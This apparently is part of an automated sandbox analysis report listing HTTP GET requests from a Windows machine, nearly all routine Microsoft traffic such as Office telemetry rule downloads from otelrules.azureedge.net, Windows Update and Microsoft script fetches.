        Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: 0x8DCEC757C1AD1D1If-Modified-Since: Mon, 14 Oct 2024 17:27:31 GMT
        Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=195712-195712If-Range: 0x8DCEC757C1AD1D1
        Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uOAVrAAkXHMSHAx&MD=G22mkc+C HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
